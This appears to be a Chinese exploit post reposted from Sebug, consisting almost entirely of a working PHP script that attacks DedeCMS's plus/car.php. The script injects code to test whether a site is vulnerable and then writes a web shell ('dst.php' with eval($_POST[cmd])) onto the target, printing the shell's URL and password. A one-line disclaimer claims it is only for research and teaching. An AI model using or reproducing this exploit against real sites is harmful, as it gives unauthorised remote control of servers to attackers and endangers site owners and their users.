测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- <?php
- $host=$argv[1];
- $path=$argv[2];
- $path=$path."plus/car.php";
- $url=$path;
- if(count($argv)<3){
- print_r('
- Usage: php '.$argv[0].' host path
- Example:
- php '.$argv[0].' www.site.com /dede/
- 作者:舞林 http://t.qq.com/wulinlw
- 修改:小逸
- ');
- exit;
- }
- $data='$a=${@phpinfo()};';
- $buffer = POST($host,80,$url,$data,30);
- preg_match("/allow_url_fopen/i", $buffer, $arr_suc);
- $str="allow_url_fopen";
- if($arr_suc[0]==$str){
- echo "Congratulations,target exist this bug. ";
- $data='$a=${@file_put_contents("dst.php","<?php eval($_POST[cmd]); ?>")};';
- $buffer = POST($host,80,$url,$data,30);
- echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
- }
- else {
- echo "Sorry,target may not exist this bug.";
- exit;
- }
- function POST($host,$port,$path,$data,$timeout, $cookie='') {
- $buffer='';
- $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
- if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
- else {
- fputs($fp, "POST $path HTTP/1.0 ");
- fputs($fp, "Host: $host ");
- fputs($fp, "Content-type: application/x-www-form-urlencoded ");
- fputs($fp, "Content-length: ".strlen($data)." ");
- fputs($fp, "Connection: close ");
- fputs($fp, $data." ");
- while(!feof($fp))
- {
- $buffer .= fgets($fp,4096);
- }
- fclose($fp);
- }
- return $buffer;
- }
- ?>
- 摘自:http://sebug.net/vuldb/ssvid-60162